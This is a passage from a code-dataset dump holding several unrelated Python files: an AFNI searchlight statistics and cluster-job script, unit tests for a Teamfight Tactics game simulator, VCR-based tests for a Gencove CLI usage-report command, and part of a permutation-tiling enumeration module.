{name}_{phase}_clst-ttest'\n \n script = f'{out_dir}/ttest_script.txt'\n os.system(f'rm {script}')\n \n for cmd in [n_cors, cd_cmd, clustsim_cmd]:\n os.system(f\"echo {cmd} >> {script}\")\n \n jobfile = f'/home1/05426/ach3377/gPPI/jobs/{name}_sl_ers_job.txt'\n os.system(f'rm {jobfile}')\n\n #not run here, just submiting a job\n os.system(f'echo singularity run --cleanenv \\\n /scratch/05426/ach3377/bids-apps/neurosft.simg \\\n bash -x {script} >> {jobfile}')\n\n os.system(f'launch -N 1 \\\n -n 1 \\\n -J 3dttest++ \\\n -s {jobfile} \\\n -m achennings@utexas.edu \\\n -p normal \\\n -r 0:05:00 \\\n -A LewPea_MRI_Analysis')\none_samp_ttest(subs=sub_args,phase='acquisition',name='healthy')\none_samp_ttest(subs=sub_args,phase='extinction',name='healthy')\none_samp_ttest(subs=p_sub_args,phase='acquisition',name='ptsd')\none_samp_ttest(subs=p_sub_args,phase='extinction',name='ptsd')\n\ndef paired_ttest(subs=None,name=''):\n out_parent = '/scratch/05426/ach3377/searchlight/ers_comps'\n out_dir = f'/scratch/05426/ach3377/searchlight/ers_comps/{name}'\n mkdir(out_dir)\n \n setA = ''\n setB = ''\n for s, sub in enumerate(subs):\n subj = bids_meta(sub)\n setA += 
f'{subj.rsa}/ers_sl_imgs/extinction_diff.nii.gz '\n setB += f'{subj.rsa}/ers_sl_imgs/acquisition_diff.nii.gz '\n\n n_cors = 'export OMP_NUM_THREADS=48'\n cd_cmd = f'cd {out_dir}'\n clustsim_cmd = f'3dttest++ -setA {setA} \\\n -setB {setB} \\\n -AminusB \\\n -paired \\\n -Clustsim 48 \\\n -mask {gm_3mm_thr} \\\n -prefix {name}_clst-ttest'\n \n script = f'{out_dir}/ttest_script.txt'\n os.system(f'rm {script}')\n \n for cmd in [n_cors, cd_cmd, clustsim_cmd]:\n os.system(f\"echo {cmd} >> {script}\")\n \n #run it\n os.system(f'singularity run --cleanenv \\\n /scratch/05426/ach3377/bids-apps/neurosft.simg \\\n bash -x {script}')\npaired_ttest(subs=sub_args,name='healthy_phase_diff')\npaired_ttest(subs=p_sub_args,name='ptsd_phase_diff')\n\ndef ind_ttest(phase=None,name=''):\n out_parent = '/scratch/05426/ach3377/searchlight/ers_comps'\n out_dir = f'/scratch/05426/ach3377/searchlight/ers_comps/{name}'\n mkdir(out_dir)\n \n setA = ''\n setB = ''\n for sub in sub_args:\n subj = bids_meta(sub)\n setA += f'{subj.rsa}/ers_sl_imgs/{phase}_diff.nii.gz '\n \n for sub in p_sub_args:\n subj = bids_meta(sub)\n setB += f'{subj.rsa}/ers_sl_imgs/{phase}_diff.nii.gz '\n \n n_cors = 'export OMP_NUM_THREADS=48'\n cd_cmd = f'cd {out_dir}'\n clustsim_cmd = f'3dttest++ -setA {setA} \\\n -setB {setB} \\\n -AminusB \\\n -Clustsim 48 \\\n -mask {gm_3mm_thr} \\\n -prefix {name}_clst-ttest'\n \n script = f'{out_dir}/ttest_script.txt'\n os.system(f'rm {script}')\n \n for cmd in [n_cors, cd_cmd, clustsim_cmd]:\n os.system(f\"echo {cmd} >> {script}\")\n \n #run it\n os.system(f'singularity run --cleanenv \\\n /scratch/05426/ach3377/bids-apps/neurosft.simg \\\n bash -x {script}')\nind_ttest(phase='acquisition',name='acq_group_diff')\nind_ttest(phase='extinction',name='ext_group_diff')\n\ndef ers_cluster(contrast=None,thr=0,nvox=0,mask='../../standard/gm_3mm_thr.nii.gz',tail=None):\n here = os.getcwd()\n folder = contrast\n name = contrast.split('/')[-1]\n os.chdir(folder)\n \n if tail == 'one-sided':\n side = '1sided RIGHT_TAIL'\n elif tail == 'two-sided':\n side = '2sided'\n\n cmap = f'{name}_ClusterMap.nii.gz';os.system(f'rm {cmap}')\n ceff = f'{name}_ClusterEffEst.nii.gz';os.system(f'rm {ceff}')\n\n ctxt = f'{name}_cluster.txt';os.system(f'rm {ctxt}')\n where = f'{name}_where.txt';os.system(f'rm {where}')\n \n cmd = f\"3dClusterize -inset {name}_clst-ttest+orig \\\n -ithr 1 \\\n -idat 0 \\\n -mask {mask} \\\n -NN 3 \\\n -{side} p={thr} \\\n -clust_nvox {nvox} \\\n -pref_map {cmap} \\\n -pref_dat {ceff} > {ctxt}\"\n\n \n os.system(cmd)\n \n if os.path.exists(f'{name}_ClusterMap.nii.gz'):\n w_cmd = f\"whereami -coord_file {ctxt}'[13,14,15]' > {where}\"\n os.system(w_cmd)\n \n\n os.chdir(here)\n\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/healthy_acquisition',thr=0.001,nvox=20,tail='one-sided')#20\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/healthy_extinction',thr=0.001,nvox=20,tail='one-sided')#20\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ptsd_acquisition',thr=0.001,nvox=20,tail='one-sided')#20\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ptsd_extinction',thr=0.001,nvox=21,tail='one-sided')#21\n\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/healthy_phase_diff',thr=0.001,nvox=16,tail='two-sided')\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ptsd_phase_diff',thr=0.001,nvox=18,tail='two-sided')\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/acq_group_diff',thr=0.001,nvox=21,tail='two-sided')\ners_cluster(contrast=f'{HOME}/Desktop/ers_comps/ext_group_diff',thr=0.001,nvox=20,tail='two-sided')\n\n# 
3dClusterize -inset healthy_CSpE__CSpA_clst-ttest+tlrc -ithr 1 -idat 0 -mask /scratch/05426/ach3377/standard/gm_1mm_thr.nii.gz -NN 2 -2sided p=0.01 -clust_nvox 498 -pref_map healthy_CSpE__CSpA_ClusterMap.nii.gz -pref_dat healthy_CSpE__CSpA_ClusterEffEst.nii.gz > healthy_CSpE__CSpA_cluster.txt\n","repo_name":"dunsmoorlab/gPPI","sub_path":"afni_sl_stats.py","file_name":"afni_sl_stats.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"343678477","text":"from Simulator.player import Player\nfrom Simulator.pool import pool\nfrom Simulator.champion import champion\nfrom Simulator import champion as c_object\nfrom Simulator.item_stats import trait_items, starting_items\nfrom Simulator.origin_class_stats import origin_class\n\n\ndef setup(player_num=0) -> Player:\n \"\"\"Creates fresh player and pool\"\"\"\n base_pool = pool()\n player1 = Player(base_pool, player_num)\n return player1\n\n\ndef azir_test():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 4\n p1.buy_champion(champion('azir'))\n p1.move_bench_to_board(0, 0, 0)\n coords = p1.board[0][0].sandguard_overlord_coordinates\n assert p1.board[coords[0][0]][coords[0][1]].name == 'sandguard'\n assert p1.board[coords[1][0]][coords[1][1]].name == 'sandguard'\n p1.move_board_to_board(1, 1, 5, 3)\n assert [5, 3] in p1.board[0][0].sandguard_overlord_coordinates\n p1.move_board_to_bench(0, 0)\n for x in range(7):\n for y in range(4):\n assert p1.board[x][y] is None\n\n p1.buy_champion(champion('azir'))\n p1.move_bench_to_board(0, 0, 0)\n coords = p1.board[0][0].sandguard_overlord_coordinates\n assert p1.board[coords[0][0]][coords[0][1]].name == 'sandguard'\n assert p1.board[coords[1][0]][coords[1][1]].name == 'sandguard'\n assert p1.num_units_in_play == 1\n p1.sell_champion(p1.board[0][0])\n for x in range(7):\n for y in range(4):\n assert p1.board[x][y] is None\n\n\ndef chosen_test():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 4\n p1.buy_champion(champion('leesin', chosen='duelist'))\n assert p1.chosen == 'duelist'\n p1.move_bench_to_board(0, 0, 0)\n assert p1.team_tiers['duelist'] == 1\n p2 = setup()\n p2.gold = 1000\n p2.max_units = 4\n p1.buy_champion(champion('leesin'))\n p1.buy_champion(champion('leesin'))\n assert p1.board[0][0].chosen == 'duelist'\n\ndef end_of_turn_actions_test():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 3\n for _ in range(8):\n p1.buy_champion(champion('leesin'))\n p1.move_bench_to_board(0, 0, 0)\n p1.buy_champion(champion('nami'))\n p1.move_bench_to_board(0, 1, 0)\n p1.add_to_item_bench('duelists_zeal')\n p1.move_item(0, 1, 0)\n p1.end_turn_actions()\n assert p1.bench[1] is None\n assert p1.bench[2] is not None\n assert p1.team_tiers['duelist'] == 1\n\ndef championDuplicatorTest():\n p1 = setup()\n p1.gold = 1000\n p1. 
max_units = 10\n p1.buy_champion(champion('leesin'))\n for x in range(4):\n p1.add_to_item_bench('champion_duplicator')\n p1.move_item(0, 0, -1)\n assert p1.item_bench[0] is None\n assert p1.bench[1].name == 'leesin'\n p1.move_bench_to_board(0, 0, 0)\n p1.move_item(1, 0, 0)\n print(p1.bench)\n assert p1.board[0][0].stars == 2\n assert p1.gold == 995\n p1.buy_champion(champion('jax'))\n p1.move_bench_to_board(0, 1, 0)\n p1.move_item(2, 1, 0)\n assert p1.bench[0].name == 'jax'\n p1.buy_champion(champion('nami'))\n p1.buy_champion(champion('aphelios'))\n p1.buy_champion(champion('vayne'))\n p1.buy_champion(champion('vi'))\n p1.buy_champion(champion('warwick'))\n p1.buy_champion(champion('teemo'))\n p1.buy_champion(champion('thresh'))\n p1.buy_champion(champion('talon'))\n p1.move_item(3, 3, -1)\n assert p1.item_bench[3] == 'champion_duplicator'\n for x in range(8):\n p1.sell_from_bench(x)\n assert p1.bench[x] is None\n\ndef magneticRemoverTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 10\n p1.buy_champion(champion('leesin'))\n p1.buy_champion(champion('jax'))\n p1.move_bench_to_board(0, 0, 0)\n p1.add_to_item_bench('magnetic_remover')\n p1.add_to_item_bench('magnetic_remover')\n p1.add_to_item_bench('mages_cap')\n for x in range(5):\n p1.add_to_item_bench('deathblade')\n for x in range(2, 5):\n p1.move_item(x, 0, 0)\n for x in range(5, 8):\n p1.move_item(x, 1, -1)\n assert p1.team_composition['mage'] != 0\n p1.move_item(0, 0, 0)\n p1.move_item(1, 1, -1)\n assert p1.team_composition['mage'] == 0\n assert p1.board[0][0].items == []\n assert p1.bench[1].items == []\n\ndef reforgerTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 10\n for x in range(3):\n p1.add_to_item_bench('reforger')\n p1.buy_champion(champion('leesin'))\n p1.buy_champion(champion('jax'))\n p1.buy_champion(champion('nami'))\n p1.add_to_item_bench('sunfire_cape')\n p1.add_to_item_bench('redemption')\n p1.add_to_item_bench('bf_sword')\n p1.add_to_item_bench('spatula')\n p1.add_to_item_bench('elderwood_heirloom')\n p1.add_to_item_bench('thieves_gloves')\n p1.move_bench_to_board(0, 0, 0)\n p1.move_item(3, 0, 0)\n p1.move_item(4, 0, 0)\n p1.move_item(5, 0, 0)\n p1.move_item(0, 0, 0)\n assert len(p1.board[0][0].items) == 0\n assert p1.item_bench[0] is None\n p1.move_item(6, 1, -1)\n p1.move_item(7, 1, -1)\n p1.move_item(8, 2, -1)\n p1.move_item(1, 1, -1)\n p1.move_item(2, 2, -1)\n test1 = False\n test2 = False\n test3 = False\n test4 = False\n for x in range(9):\n if p1.item_bench[x] == 'reforger':\n test1 = True\n if p1.item_bench[x] == 'spatula':\n test2 = True\n if p1.item_bench[x] in list(trait_items.values()):\n test3 = True\n if p1.item_bench[x] in starting_items:\n test4 = True\n assert not test1\n assert test2\n assert test3\n assert test4\n\ndef thiefsGloveCombatTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 1\n p2 = setup()\n p2.gold = 1000\n p2.max_units = 1\n p1.buy_champion(champion('nami'))\n p2.buy_champion(champion('nami'))\n p1.add_to_item_bench('thieves_gloves')\n p2.add_to_item_bench('thieves_gloves')\n p1.move_bench_to_board(0, 0, 0)\n p2.move_bench_to_board(0, 0, 0)\n p1.move_item(0, 0, 0)\n p2.move_item(0, 0, 0)\n p1.add_to_item_bench('deathblade')\n p1.move_item(0, 0, 0)\n assert p1.item_bench[0] == 'deathblade'\n c_object.run(c_object.champion, p1, p2)\n assert p1.board[0][0].items[0] == 'thieves_gloves'\n\ndef thiefsGlovesTest():\n p1 = setup()\n p1.gold = 1000\n p1.max_units = 1\n p1.buy_champion(champion('azir'))\n p1.buy_champion(champion('garen'))\n 
p1.add_to_item_bench('thieves_gloves')\n p1.move_bench_to_board(0, 0, 0)\n p1.move_item(0, 0, 0)\n assert p1.board[0][0].items[0] == 'thieves_gloves'\n for x in range(3):\n p1.start_round(x)\n p1.move_board_to_board(0, 0, 6, 3)\n p1.start_round(3)\n p1.move_board_to_bench(6, 3)\n p1.start_round(4)\n p1.sell_from_bench(0)\n p1.buy_champion(champion('azir'))\n p1.move_item(0, 0, -1)\n p1.start_round(5)\n\ndef kaynTests():\n p1 = setup()\n p2 = setup(1)\n p1.gold = 500\n p2.gold = 500\n p1.max_units = 10\n p2.max_units = 10\n p1.buy_champion(champion('kayn'))\n p1.move_bench_to_board(0, 0, 0)\n for x in range(3):\n p1.start_round(x)\n p2.start_round(x)\n p2.buy_champion(champion('kayn'))\n p2.move_bench_to_board(0, x, 0)\n assert p1.kayn_transformed, 'Kayn should transform after his third round in combat'\n assert not p2.kayn_transformed\n assert p1.item_bench[0] == 'kayn_shadowassassin'\n assert p1.item_bench[1] == 'kayn_rhast'\n p2.start_round(3)\n assert p2.kayn_transformed\n p1.move_item(0, 0, 0)\n assert p2.item_bench[0] == 'kayn_shadowassassin'\n assert p2.item_bench[1] == 'kayn_rhast'\n for x in range(7):\n for y in range(4):\n if p2.board[x][y]:\n p2.move_item(1, x, y)\n break\n assert p1.kayn_form == 'kayn_shadowassassin'\n assert p2.kayn_form == 'kayn_rhast'\n p1.buy_champion(champion('kayn'))\n assert p1.bench[0].kayn_form == 'kayn_shadowassassin'\n for x in range(10):\n assert not p1.item_bench[x]\n\ndef level2Champion():\n \"\"\"Creates 3 Zileans, there should be 1 2* Zilean on bench\"\"\"\n p1 = setup()\n p1.gold = 100000\n p1.max_units = 10\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[0].stars == 2, \"champion should be 2*\"\n for x in range(1, 9):\n assert p1.bench[x] is None, \"these slot should be empty\"\n for x in p1.board:\n for y in x:\n assert y is None, \"the board should be empty\"\n\n\ndef level3Champion():\n \"\"\"Creates 9 Zileans, there should be 1 3* Zilean on bench\"\"\"\n p1 = setup()\n p1.gold = 100000\n p1.max_units = 1000\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[0].stars == 2\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[1].stars == 2\n for x in range(3):\n p1.buy_champion(champion(\"zilean\"))\n assert p1.bench[0].stars == 3, \"champion should be 3*\"\n for x in range(1, 9):\n assert p1.bench[x] is None, \"this slot should be empty\"\n for x in p1.board:\n for y in x:\n assert y is None, \"the board should be empty\"\n\n\ndef levelChampFromField():\n \"\"\"buy third copy while 1 copy on field\"\"\"\n p1 = setup()\n p1.gold = 100000\n p1.max_units = 1000\n p1.buy_champion(champion(\"zilean\"))\n p1.buy_champion(champion(\"zilean\"))\n p1.move_bench_to_board(1, 0, 0)\n p1.buy_champion(champion(\"zilean\"))\n for x in p1.bench:\n assert x is None, \"bench should be empty\"\n assert p1.board[0][0].stars == 2, \"the unit placed on the field should be 2*\"\n\n\n# Please expand on this test or add additional tests here.\n# I am sure there are some bugs with the level cutoffs for example\n# Like I do not think I am hitting level 3 on the correct round without buying any exp\ndef buyExp():\n p1 = setup()\n p1.level_up()\n lvl = p1.level\n while p1.level < p1.max_level:\n p1.exp = p1.level_costs[p1.level + 1]\n p1.level_up()\n lvl += 1\n assert lvl == p1.level\n\n\ndef spamExp():\n \"\"\"buys tons of experience\"\"\"\n p1 = setup()\n p1.gold = 100000\n for _ in range(1000):\n p1.buy_exp()\n assert p1.level == p1.max_level, \"I should be max level\"\n assert p1.exp 
== 0, \"I should not have been able to buy experience after hitting max lvl\"\n\n\ndef incomeTest1():\n \"\"\"first test for gold income\"\"\"\n p1 = setup()\n p1.gold = 15\n p1.gold_income(5)\n assert p1.gold == 21, f\"Interest calculation is messy, gold should be 21, it is {p1.gold}\"\n\n\ndef incomeTest2():\n \"\"\"Check for income cap\"\"\"\n p1 = setup()\n p1.gold = 1000\n p1.gold_income(5)\n assert p1.gold == 1010, f\"Interest calculation is messy, gold should be 1010, it is {p1.gold}\"\n\n\ndef incomeTest3():\n \"\"\"Checks win streak gold\"\"\"\n p1 = setup()\n p1.gold = 0\n p1.win_streak = 0\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 1\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 2\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 3\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 4\n p1.gold_income(5)\n assert p1.gold == 7, f\"Interest calculation is messy, gold should be 7, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 5\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n p1.gold = 0\n p1.win_streak = 500\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n\n\ndef incomeTest4():\n \"\"\"Checks loss streak gold\"\"\"\n p1 = setup()\n p1.gold = 0\n p1.loss_streak = 0\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 1\n p1.gold_income(5)\n assert p1.gold == 5, f\"Interest calculation is messy, gold should be 5, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 2\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 3\n p1.gold_income(5)\n assert p1.gold == 6, f\"Interest calculation is messy, gold should be 6, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 4\n p1.gold_income(5)\n assert p1.gold == 7, f\"Interest calculation is messy, gold should be 7, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 5\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n p1.gold = 0\n p1.loss_streak = 500\n p1.gold_income(5)\n assert p1.gold == 8, f\"Interest calculation is messy, gold should be 8, it is {p1.gold}\"\n\n\ndef test_list():\n \"\"\"tests all test cases\"\"\"\n azir_test()\n chosen_test()\n end_of_turn_actions_test()\n\n championDuplicatorTest()\n magneticRemoverTest()\n reforgerTest()\n\n thiefsGloveCombatTest()\n thiefsGlovesTest()\n\n kaynTests()\n\n level2Champion()\n level3Champion()\n levelChampFromField()\n\n buyExp()\n # spamExp()\n\n # Problem: Interest gets calculated after base income is added\n incomeTest1()\n # Problem: Interest rate not capped\n incomeTest2()\n incomeTest3()\n incomeTest4()\n\n # I would like to go over move commands again before writing test code for that\n 
pass\n","repo_name":"silverlight6/TFTMuZeroAgent","sub_path":"UnitTests/player_test.py","file_name":"player_test.py","file_ext":"py","file_size_in_byte":13482,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"53"}
+{"seq_id":"14961130302","text":"\"\"\"Test reports monthly-usage command.\"\"\"\n\n# pylint: disable=wrong-import-order, import-error\nimport operator\nimport os\n\nfrom click.testing import CliRunner\n\nfrom gencove.client import APIClient, APIClientError # noqa: I100\nfrom gencove.command.reports.cli import monthly_usage\nfrom gencove.tests.decorators import assert_authorization\nfrom gencove.tests.filters import (\n filter_aws_headers,\n filter_jwt,\n replace_gencove_url_vcr,\n)\nfrom gencove.tests.reports.vcr.filters import (\n filter_monthly_usage_report_request,\n filter_report_response_body,\n filter_report_response_filename,\n)\nfrom gencove.tests.upload.vcr.filters import filter_volatile_dates\nfrom gencove.tests.utils import get_response_from_vcr_dict, get_vcr_response\n\nimport pytest\n\nfrom vcr import VCR\n\n\n@pytest.fixture(scope=\"module\")\ndef vcr_config():\n \"\"\"VCR configuration.\"\"\"\n return {\n \"cassette_library_dir\": \"gencove/tests/reports/vcr\",\n \"filter_headers\": [\"Authorization\", \"Content-Length\", \"User-Agent\", \"ETag\"],\n \"filter_post_data_parameters\": [\n (\"email\", \"email@example.com\"),\n (\"password\", \"mock_password\"),\n ],\n \"match_on\": [\"method\", \"scheme\", \"port\", \"path\", \"query\"],\n \"path_transformer\": VCR.ensure_suffix(\".yaml\"),\n \"before_record_request\": [\n replace_gencove_url_vcr,\n filter_monthly_usage_report_request,\n ],\n \"before_record_response\": [\n filter_jwt,\n filter_aws_headers,\n filter_volatile_dates,\n filter_report_response_body,\n filter_report_response_filename,\n ],\n }\n\n\n@pytest.mark.vcr\n@assert_authorization\ndef test_monthly_usage__success( # pylint: disable=too-many-arguments,unused-argument\n credentials, mocker, recording, vcr\n):\n \"\"\"Test monthly usage report success case\"\"\"\n runner = CliRunner()\n if not recording:\n monthly_usage_dict = get_vcr_response(\n \"/api/v2/organization-monthly-usage-report/\",\n vcr,\n operator.contains,\n just_body=False,\n )\n response = get_response_from_vcr_dict(monthly_usage_dict)\n\n # Need to reconstruct the raw response\n mocked_monthly_usage = mocker.patch.object(\n APIClient,\n \"get_organization_monthly_usage_report\",\n return_value=response,\n )\n with runner.isolated_filesystem():\n os.mkdir(\"tempdir\")\n res = runner.invoke(\n monthly_usage,\n [\n *credentials,\n ],\n )\n\n assert res.exit_code == 0\n if not recording:\n mocked_monthly_usage.assert_called_once()\n assert \"Saved organization monthly usage report CSV\" in res.output\n\n\n@pytest.mark.vcr\n@assert_authorization\ndef test_monthly_usage__success_dates(\n credentials, mocker, recording, vcr\n): # pylint: disable=too-many-arguments,too-many-locals,unused-argument\n \"\"\"Test monthly usage report success case with requested dates\"\"\"\n runner = CliRunner()\n if not recording:\n monthly_usage_dict = get_vcr_response(\n \"/api/v2/organization-monthly-usage-report/\",\n vcr,\n operator.contains,\n just_body=False,\n )\n response = get_response_from_vcr_dict(monthly_usage_dict)\n\n # Need to reconstruct the raw response\n mocked_monthly_usage = mocker.patch.object(\n APIClient,\n \"get_organization_monthly_usage_report\",\n return_value=response,\n )\n with runner.isolated_filesystem():\n os.mkdir(\"tempdir\")\n outfile = \"tempdir/test.csv\"\n res = runner.invoke(\n monthly_usage,\n [\n \"--output-filename\",\n f\"{outfile}\",\n \"--from\",\n \"2021-09\",\n \"--to\",\n \"2021-10\",\n *credentials,\n ],\n )\n\n with open(outfile, \"r\", encoding=\"utf-8\") as fileobj:\n 
contents = fileobj.readlines()\n\n assert res.exit_code == 0\n if not recording:\n mocked_monthly_usage.assert_called_once()\n assert \"Saved organization monthly usage report CSV\" in res.output\n\n # Confirm columns are as expected\n columns_row = contents[0]\n columns = columns_row.strip().split(\",\")\n assert \"year\" in columns\n assert \"month\" in columns\n assert \"succeeded_samples\" in columns\n assert \"failed_samples\" in columns\n\n # should be two months of data + headers\n assert len(contents) == 3\n\n\n@pytest.mark.vcr\n@assert_authorization\ndef test_monthly_usage__bad_date( # pylint: disable=too-many-arguments,unused-argument\n credentials, mocker, recording, vcr\n):\n \"\"\"Test monthly usage report with bad date value\"\"\"\n runner = CliRunner()\n if not recording:\n monthly_usage_dict = get_vcr_response(\n \"/api/v2/organization-monthly-usage-report/\",\n vcr,\n operator.contains,\n just_body=False,\n )\n response = get_response_from_vcr_dict(monthly_usage_dict)\n\n # Need to reconstruct the raw response\n mocked_monthly_usage = mocker.patch.object(\n APIClient,\n \"get_organization_monthly_usage_report\",\n side_effect=APIClientError(\n message=response.content,\n status_code=response.status_code,\n ),\n return_value=response,\n )\n\n with runner.isolated_filesystem():\n os.mkdir(\"tempdir\")\n # invoke without --to param\n res = runner.invoke(\n monthly_usage,\n [\n \"--from\",\n \"2023-01\",\n *credentials,\n ],\n )\n\n assert res.exit_code == 0\n if not recording:\n mocked_monthly_usage.assert_called_once()\n assert \"There was an error retrieving the monthly usage report\" in res.output\n assert (\n \"Must provide both 'from' and 'to' query parameters, or neither\" in res.output\n )\n","repo_name":"gncv/gencove-cli","sub_path":"gencove/tests/reports/test_reports_monthly_usage.py","file_name":"test_reports_monthly_usage.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"39012568249","text":"import abc\nfrom collections import deque\nfrom itertools import chain\nfrom typing import TYPE_CHECKING, Any, Dict, FrozenSet, Iterable, Optional\n\nimport requests\nfrom sympy import Expr, Symbol, diff, simplify, sympify, var\n\nfrom comb_spec_searcher.utils import taylor_expand\nfrom permuta import Av\nfrom permuta.permutils.symmetry import lex_min\nfrom tilings.exception import InvalidOperationError\nfrom tilings.griddedperm import GriddedPerm\nfrom tilings.misc import is_tree\n\nif TYPE_CHECKING:\n from tilings import Tiling\n\nx = Symbol(\"x\")\n\n\nclass Enumeration(abc.ABC):\n \"\"\"\n General representation of a strategy to enumerate tilings.\n \"\"\"\n\n def __init__(self, tiling: \"Tiling\"):\n self.tiling = tiling\n\n @abc.abstractmethod\n def verified(self) -> bool:\n \"\"\"\n Returns True if enumeration strategy works for the tiling.\n \"\"\"\n raise NotImplementedError\n\n def get_genf(self, **kwargs) -> Expr:\n \"\"\"\n Returns the generating function for the tiling.\n\n Raises an InvalidOperationError if the tiling is not verified.\n \"\"\"\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n raise NotImplementedError\n\n def __repr__(self) -> str:\n return \"Enumeration for:\\n\" + str(self.tiling)\n\n\nclass LocalEnumeration(Enumeration):\n \"\"\"\n Enumeration strategy for a locally enumerable tiling.\n\n A tiling is locally enumerable if the tiling has no crossing obstructions\n or requirements.\n\n There's not universal way of describing a tiling that is locally enumerable\n with a specification.\n \"\"\"\n\n def __init__(self, tiling, no_req=False):\n super().__init__(tiling)\n self.no_req = no_req\n\n def verified(self) -> bool:\n if self.no_req and self.tiling.requirements:\n return False\n return (\n all(gp.is_single_cell() for gp in self.tiling.obstructions)\n and all(self._req_is_single_cell(req) for req in self.tiling.requirements)\n and all(\n gp.is_single_cell()\n for gp in chain.from_iterable(\n ass.gps for ass in self.tiling.assumptions\n )\n )\n )\n\n @staticmethod\n def _req_is_single_cell(req: Iterable[GriddedPerm]) -> bool:\n \"\"\"\n Returns True if all the gridded perm in the iterable are single cell and in\n the same cell.\n \"\"\"\n req_iter = iter(req)\n gp0 = next(req_iter)\n if not gp0.is_single_cell():\n return False\n cell = gp0.pos[0]\n all_cells = chain.from_iterable(gp.pos for gp in req_iter)\n return all(c == cell for c in all_cells)\n\n def get_genf(self, **kwargs) -> Any:\n # pylint: disable=too-many-return-statements\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n\n funcs: Optional[Dict[\"Tiling\", Any]] = kwargs.get(\"funcs\")\n if funcs is None:\n funcs = {}\n if self.tiling.requirements:\n reqs = self.tiling.requirements[0]\n avoided = self.tiling.__class__(\n self.tiling.obstructions + reqs,\n self.tiling.requirements[1:],\n self.tiling.assumptions,\n )\n without = self.tiling.__class__(\n self.tiling.obstructions,\n self.tiling.requirements[1:],\n self.tiling.assumptions,\n )\n avgf = LocalEnumeration(avoided).get_genf(funcs=funcs)\n wogf = LocalEnumeration(without).get_genf(funcs=funcs)\n return wogf - avgf\n if self.tiling in funcs:\n return funcs[self.tiling]\n # also return something entirely different if the root class/not verified\n if self.tiling.dimensions == (1, 1):\n if self.tiling.is_epsilon():\n return 1\n if self.tiling == self.tiling.__class__.from_string(\"01_10\"):\n return 1 + x\n basis = [ob.patt for ob 
in self.tiling.obstructions]\n basis_str = \"_\".join(map(str, lex_min(basis)))\n uri = f\"https://permpal.com/perms/raw_data_json/basis/{basis_str}\"\n request = requests.get(uri, timeout=10)\n if request.status_code == 404:\n raise NotImplementedError(f\"No entry on permpal for {Av(basis)}\")\n data = request.json()\n if data[\"generating_function_sympy\"] is None:\n raise NotImplementedError(\n f\"No explicit generating function on permpal for {Av(basis)}\"\n )\n return sympify(data[\"generating_function_sympy\"])\n gf = None\n if MonotoneTreeEnumeration(self.tiling).verified():\n gf = MonotoneTreeEnumeration(self.tiling).get_genf()\n if DatabaseEnumeration(self.tiling).verified():\n gf = DatabaseEnumeration(self.tiling).get_genf()\n if gf is not None:\n funcs[self.tiling] = gf\n return gf\n # TODO: should this create a spec as in the strategy?\n raise NotImplementedError(\n f\"Not sure how to enumerate the tiling:\\n{self.tiling}\"\n )\n\n\nclass MonotoneTreeEnumeration(Enumeration):\n \"\"\"\n Enumeration strategy for a monotone tree tiling.\n\n A tiling is a monotone tree if it is local, its cell graph is a tree and\n all but possibly one cell are monotone.\n\n A monotone tree tiling can be described by a tree where the verified object\n are the cells of the tiling.\n \"\"\"\n\n _tracking_var = var(\"t\")\n\n def verified(self):\n no_req_list = all(len(rl) == 1 for rl in self.tiling.requirements)\n num_non_monotone = sum(\n 1 for c in self.tiling.active_cells if not self.tiling.is_monotone_cell(c)\n )\n return (\n self.tiling.dimensions != (1, 1)\n and LocalEnumeration(self.tiling).verified()\n and no_req_list\n and num_non_monotone <= 1\n and is_tree(self.tiling.active_cells, self.tiling.cell_graph())\n )\n\n def _cell_tree_traversal(self, start):\n \"\"\"\n Traverse the tree by starting at `start` and always visiting an entire\n row or column before going somewhere else.\n\n The start vertices is not 